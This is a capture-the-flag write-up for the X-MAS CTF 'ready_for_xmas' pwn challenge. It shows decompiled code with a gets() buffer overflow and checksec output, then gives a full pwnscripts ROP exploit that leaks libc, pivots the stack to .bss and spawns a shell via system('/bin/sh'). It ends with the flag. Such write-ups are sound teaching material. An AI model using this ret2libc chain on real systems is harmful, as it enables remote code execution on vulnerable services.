Tags: rop pwnscripts ret2libc
Rating:
SOLVED
Are you ready for aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/bin/shawhkj\xffwaa ?
Target: nc challs.xmas.htsp.ro 2001
Author: Th3R4nd0m
Files: ready_for_xmas.zip
pwnscriptsimportant stuff in decompiler:
int system(const char *s) {
return system(s);
}
void set_rdx_as_r15() {
// this sets rdx = r15
}
int main() {
char haystack[64]; // [rsp+0h] [rbp-40h] BYREF
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
if ( has_main_occured )
exit(0);
memset(aCatFlag, 0, sizeof(aCatFlag));
puts("Hi. How are you doing today, good sir? Ready for Christmas?");
gets(haystack); // !!!! vuln !!!!
if ( strstr(haystack, "sh") || strstr(haystack, "cat") )
exit(0); // if haystack contains these strings
has_main_occured = 1;
mprotect(&has_main_occured, 1uLL, 1);
return 0;
}
checksec:
[*] chall
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
This challenge was presumably designed with the idea of disabling mprotect with the inline assembly function. Or something. The set_rdx_as_r15() function is a little bit confusing, considering you can use ret2csu to set rdx without anything special.
I'm also not entirely sure what the point of having a system() function was; I just busted through the challenge with a ROP to .bss to ROP to libc's /bin/sh.
from pwnscripts import *
context.binary = 'chall'
context.libc_database = '../libc-database'
context.libc = 'libc.so.6'
NOWHERE = 0x601900
r = remote('challs.xmas.htsp.ro', 2001)
PAD = 0x48
R = ROP(context.binary)
R.raw(PAD*b'a')
R.puts(context.binary.got['gets'])
R.gets(NOWHERE)
R.migrate(NOWHERE)
r.sendlineafter('\n', R.chain())
context.libc.calc_base('gets', unpack_bytes(r.recvline(),6))
R = ROP(context.binary)
R.system(context.libc.symbols['str_bin_sh'])
r.sendline(R.chain())
r.interactive()
X-MAS{l00ks_lik3_y0u_4re_r3ady}
